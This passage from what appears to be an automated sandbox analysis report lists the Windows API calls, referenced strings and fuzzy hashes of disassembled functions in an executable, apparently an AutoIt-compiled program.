        • LoadCursorW.USER32(00000000,00007F02), ref: 0025FECC
        • GetCursorInfo.USER32(?), ref: 0025FEDC
        • GetLastError.KERNEL32 ref: 0025FF1E
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Cursor$Load$ErrorInfoLast
        • String ID:
        • API String ID: 3215588206-0
        • Opcode ID: 127b649b7ef975ca346f60f315e0d7ae11304891b34c94c681de438e1e5ee247
        • Instruction ID: b781d9716901b22441e1ce9c39ddeabf87f21472bdbe5eb790016d565c8a249f
        • Opcode Fuzzy Hash: 127b649b7ef975ca346f60f315e0d7ae11304891b34c94c681de438e1e5ee247
        • Instruction Fuzzy Hash: 214172B0D0431A6ADB509FBA8C8985EBFE8FF04354B50452AE51DE7681DB78A901CF90
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen
        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[*
        • API String ID: 176396367-998612648
        • Opcode ID: 87c5bf9931cf258698161ecb1cdc8318318eeb891d972c66cfd11885b08c859f
        • Instruction ID: 6abcf6daf3bfbfbde97616f5fe80628f82615368256d41ee50a75c67fa9756a3
        • Opcode Fuzzy Hash: 87c5bf9931cf258698161ecb1cdc8318318eeb891d972c66cfd11885b08c859f
        • Instruction Fuzzy Hash: 3EE1F732A20617ABCB1CDF74C4416EEFBB0BF54710F548129E956E7280DF70AEA58B90
        APIs
        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002000C6
          • Part of subcall function 002000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(002B070C,00000FA0,AD81C75C,?,?,?,?,002223B3,000000FF), ref: 0020011C
          • Part of subcall function 002000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002223B3,000000FF), ref: 00200127
          • Part of subcall function 002000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002223B3,000000FF), ref: 00200138
          • Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0020014E
          • Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0020015C
          • Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0020016A
          • Part of subcall function 002000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00200195
          • Part of subcall function 002000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002001A0
        • ___scrt_fastfail.LIBCMT ref: 002000E7
          • Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9
        Strings
        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00200122
        • kernel32.dll, xrefs: 00200133
        • InitializeConditionVariable, xrefs: 00200148
        • WakeAllConditionVariable, xrefs: 00200162
        • SleepConditionVariableCS, xrefs: 00200154
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
        • API String ID: 66158676-1714406822
        • Opcode ID: 735567263aedf6911d6b9b5fc1ac99fb18204d3a315a03151184d53bca78ecd8
        • Instruction ID: 1abb683090998709eba8c9d48f5f1fb0df7e3899e4a23fe479b8731857d10fef
        • Opcode Fuzzy Hash: 735567263aedf6911d6b9b5fc1ac99fb18204d3a315a03151184d53bca78ecd8
        • Instruction Fuzzy Hash: E721F9326647116BF7215F74BC8DB6AB394EB06B51F11413EF90D922D2DFB098108AA0
        APIs
        • CharLowerBuffW.USER32(00000000,00000000,0027CC08), ref: 00254527
        • _wcslen.LIBCMT ref: 0025453B
        • _wcslen.LIBCMT ref: 00254599
        • _wcslen.LIBCMT ref: 002545F4
        • _wcslen.LIBCMT ref: 0025463F
        • _wcslen.LIBCMT ref: 002546A7
          • Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD
        • GetDriveTypeW.KERNEL32(?,002A6BF0,00000061), ref: 00254743
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$BuffCharDriveLowerType
        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
        • API String ID: 2055661098-1000479233
        • Opcode ID: 25d8407ac7df93cb66e9d27f486f5ff3588261a3309ffcd75014e9104e54b4ba
        • Instruction ID: 2ee2c7398f7c3c0dc452ee8a37269dd5860fb09998b997c36bd018fa0de16004
        • Opcode Fuzzy Hash: 25d8407ac7df93cb66e9d27f486f5ff3588261a3309ffcd75014e9104e54b4ba
        • Instruction Fuzzy Hash: 27B104316283029FC710EF28C890A7EF7E5AFA5769F50491DF896C7291E730D899CB52
        APIs
          • Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2
        • DragQueryPoint.SHELL32(?,?), ref: 00279147
          • Part of subcall function 00277674: ClientToScreen.USER32(?,?), ref: 0027769A
          • Part of subcall function 00277674: GetWindowRect.USER32(?,?), ref: 00277710
          • Part of subcall function 00277674: PtInRect.USER32(?,?,00278B89), ref: 00277720
        • SendMessageW.USER32(?,000000B0,?,?), ref: 002791B0
        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002791BB
        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002791DE
        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00279225
        • SendMessageW.USER32(?,000000B0,?,?), ref: 0027923E
        • SendMessageW.USER32(?,000000B1,?,?), ref: 00279255
        • SendMessageW.USER32(?,000000B1,?,?), ref: 00279277
        • DragFinish.SHELL32(?), ref: 0027927E
        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00279371
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#+
        • API String ID: 221274066-3707098397
        • Opcode ID: c7e3481f970ce1cb3c2f3cd78d6a184081dd6cc28e9edebc6d53b2da4028288f
        • Instruction ID: ec2bb82bf6c5b1b030ca4100b1dd1a7ca9c789f86a2448293d3826cd393e2bd7
        • Opcode Fuzzy Hash: c7e3481f970ce1cb3c2f3cd78d6a184081dd6cc28e9edebc6d53b2da4028288f
        • Instruction Fuzzy Hash: 5C61BD31108341AFC304EF64DC89DAFBBE8EF99350F50091DF595931A1DB309A99CB92
        APIs
        • GetMenuItemCount.USER32(002B1990), ref: 00222F8D
        • GetMenuItemCount.USER32(002B1990), ref: 0022303D
        • GetCursorPos.USER32(?), ref: 00223081
        • SetForegroundWindow.USER32(00000000), ref: 0022308A
        • TrackPopupMenuEx.USER32(002B1990,00000000,?,00000000,00000000,00000000), ref: 0022309D
        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002230A9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
        • String ID: 0
        • API String ID: 36266755-4108050209
        • Opcode ID: 0deb3ed03f48a127a02166a318b2934b6f4b0ebdafe061623526c6ea5cd7f6ab
        • Instruction ID: ff32f6ea00246b90da6f4cc3c04a0ffa3804f3ebdc822149339f0f6f0a9d535b
        • Opcode Fuzzy Hash: 0deb3ed03f48a127a02166a318b2934b6f4b0ebdafe061623526c6ea5cd7f6ab
        • Instruction Fuzzy Hash: 91712B70640216BEEB258F65ED8DF9ABF64FF00324F204206F6256A1E0C7B2A964DB50
        APIs
        • DestroyWindow.USER32(00000000,?), ref: 00276DEB
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00276E5F
        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00276E81
        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00276E94
        • DestroyWindow.USER32(?), ref: 00276EB5
        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001E0000,00000000), ref: 00276EE4
        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00276EFD
        • GetDesktopWindow.USER32 ref: 00276F16
        • GetWindowRect.USER32(00000000), ref: 00276F1D
        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00276F35
        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00276F4D
          • Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
        • String ID: 0$tooltips_class32
        • API String ID: 2429346358-3619404913
        • Opcode ID: 7be90ecfdb6480fbb168933920495cb76741568a4823b7748184dffd27908085
        • Instruction ID: 3c3f338d0bc756101d7e33d394e2a30dfd9a6ff62ed6c2abca778ad881265ecd
        • Opcode Fuzzy Hash: 7be90ecfdb6480fbb168933920495cb76741568a4823b7748184dffd27908085
        • Instruction Fuzzy Hash: BC71A870100641AFDB25DF28EC48FBABBF9FB89300F64451DF98987261C770A969CB12
        APIs
        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0025C4B0
        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0025C4C3
        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0025C4D7
        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0025C4F0
        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0025C533
        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0025C549
        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0025C554
        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0025C584
        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0025C5DC
        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0025C5F0
        • InternetCloseHandle.WININET(00000000), ref: 0025C5FB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
        • String ID:
        • API String ID: 3800310941-3916222277
        • Opcode ID: e81d4e3d4aebcdf19482eaeb44dae860bf0a1338e8199b0c391dda01b36cf296
        • Instruction ID: 3603bd61703d669716648812a8930b5011639e088b65e62982de690783088a62
        • Opcode Fuzzy Hash: e81d4e3d4aebcdf19482eaeb44dae860bf0a1338e8199b0c391dda01b36cf296
        • Instruction Fuzzy Hash: F2516EB0510305BFDB218FA4DD88ABB7BBCFF08755F60441EF945A6210EB34EA589B64
        APIs
        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00278592
        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785A2
        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785AD
        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785BA
        • GlobalLock.KERNEL32(00000000), ref: 002785C8
        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785D7
        • GlobalUnlock.KERNEL32(00000000), ref: 002785E0
        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785E7
        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785F8
        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0027FC38,?), ref: 00278611
        • GlobalFree.KERNEL32(00000000), ref: 00278621
        • GetObjectW.GDI32(?,00000018,?), ref: 00278641
        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00278671
        • DeleteObject.GDI32(?), ref: 00278699
        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002786AF
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
        • String ID:
        • API String ID: 3840717409-0
        • Opcode ID: 971592ec18f40949a88b5af364619d6e5d2c3aa20870408d83a2548518aacb94
        • Instruction ID: 616b079b455399257a5020085e9e1d4aa51cd6c4859fb88948bc3863609aac86
        • Opcode Fuzzy Hash: 971592ec18f40949a88b5af364619d6e5d2c3aa20870408d83a2548518aacb94
        • Instruction Fuzzy Hash: F141F875641209BFDB119FA5DC8CEAA7BBCFF89B11F248058F909E7260DB709941CB60
        APIs
        • VariantInit.OLEAUT32(00000000), ref: 00251502
        • VariantCopy.OLEAUT32(?,?), ref: 0025150B
        • VariantClear.OLEAUT32(?), ref: 00251517
        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002515FB
        • VarR8FromDec.OLEAUT32(?,?), ref: 00251657
        • VariantInit.OLEAUT32(?), ref: 00251708
        • SysFreeString.OLEAUT32(?), ref: 0025178C
        • VariantClear.OLEAUT32(?), ref: 002517D8
        • VariantClear.OLEAUT32(?), ref: 002517E7
        • VariantInit.OLEAUT32(00000000), ref: 00251823
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
        • String ID: %4d%02d%02d%02d%02d%02d$Default
        • API String ID: 1234038744-3931177956
        • Opcode ID: 33c02f05f7480b74315803662a4233678b6df566fa7fb987c878b27852e2a527
        • Instruction ID: 44486e7ebcf6e0bc72e4b564c008aaef66955fbe509c15392d5ec42aaa17300b
        • Opcode Fuzzy Hash: 33c02f05f7480b74315803662a4233678b6df566fa7fb987c878b27852e2a527
        • Instruction Fuzzy Hash: 5BD15671A20105DBCB10AF65E888B7DB7B4BF44701F60805AFC06AB190EBB4DC79DB65
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E
        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026B6F4
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026B772
        • RegDeleteValueW.ADVAPI32(?,?), ref: 0026B80A
        • RegCloseKey.ADVAPI32(?), ref: 0026B87E
        • RegCloseKey.ADVAPI32(?), ref: 0026B89C
        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0026B8F2
        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0026B904
        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0026B922
        • FreeLibrary.KERNEL32(00000000), ref: 0026B983
        • RegCloseKey.ADVAPI32(00000000), ref: 0026B994
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
        • String ID: RegDeleteKeyExW$advapi32.dll
        • API String ID: 146587525-4033151799
        • Opcode ID: b9222bbde5116ca99211616be2efa55d267bb643dfb8195c6ab930238f652ff5
        • Instruction ID: 7bf0e749544ac5d4705613ff1b2946b99e11331975cf9fb5dd77e4dbb8bfd988
        • Opcode Fuzzy Hash: b9222bbde5116ca99211616be2efa55d267bb643dfb8195c6ab930238f652ff5
        • Instruction Fuzzy Hash: 27C19C31218642AFD715DF25C494F2ABBE5BF84308F54845CF49A8B2A2CB71EC96CB91
        APIs
        • GetDC.USER32(00000000), ref: 002625D8
        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002625E8
        • CreateCompatibleDC.GDI32(?), ref: 002625F4
        • SelectObject.GDI32(00000000,?), ref: 00262601
        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0026266D
        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002626AC
        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002626D0
        • SelectObject.GDI32(?,?), ref: 002626D8
        • DeleteObject.GDI32(?), ref: 002626E1
        • DeleteDC.GDI32(?), ref: 002626E8
        • ReleaseDC.USER32(00000000,?), ref: 002626F3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
        • String ID: (
        • API String ID: 2598888154-3887548279
        • Opcode ID: 893e89317b73c4d2a95b7bedbe3864be79585691bc71785821e0e6cddb987457
        • Instruction ID: e4e3086dea31a41ed9c9d379af2dd12f247df8e752d5954213334679a726ce1a
        • Opcode Fuzzy Hash: 893e89317b73c4d2a95b7bedbe3864be79585691bc71785821e0e6cddb987457
        • Instruction Fuzzy Hash: 8D61F375D10219EFCF14CFA4D888EAEBBB9FF48310F208529E959A7250D770A991CF90
        APIs
        • ___free_lconv_mon.LIBCMT ref: 0021DAA1
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D659
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D66B
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D67D
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D68F
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6A1
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6B3
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6C5
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6D7
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6E9
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6FB
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D70D
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D71F
          • Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D731
        • _free.LIBCMT ref: 0021DA96
          • Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
          • Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0
        • _free.LIBCMT ref: 0021DAB8
        • _free.LIBCMT ref: 0021DACD
        • _free.LIBCMT ref: 0021DAD8
        • _free.LIBCMT ref: 0021DAFA
        • _free.LIBCMT ref: 0021DB0D
        • _free.LIBCMT ref: 0021DB1B
        • _free.LIBCMT ref: 0021DB26
        • _free.LIBCMT ref: 0021DB5E
        • _free.LIBCMT ref: 0021DB65
        • _free.LIBCMT ref: 0021DB82
        • _free.LIBCMT ref: 0021DB9A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
        • String ID:
        • API String ID: 161543041-0
        • Opcode ID: b2006d628fedb886ca22f8d57afdb7a8e7d7b170fe08cfc6f84278f32f227f55
        • Instruction ID: e2da868e72707bcc4a2f2740365d3fb5dbd32792a5ca4da653758a0858295697
        • Opcode Fuzzy Hash: b2006d628fedb886ca22f8d57afdb7a8e7d7b170fe08cfc6f84278f32f227f55
        • Instruction Fuzzy Hash: 7C316D3262460ADFDB21AE38E841BD677E8FF20320F204429F049DB191DE31ADF48B20
        APIs
        • GetClassNameW.USER32(?,?,00000100), ref: 0024369C
        • _wcslen.LIBCMT ref: 002436A7
        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00243797
        • GetClassNameW.USER32(?,?,00000400), ref: 0024380C
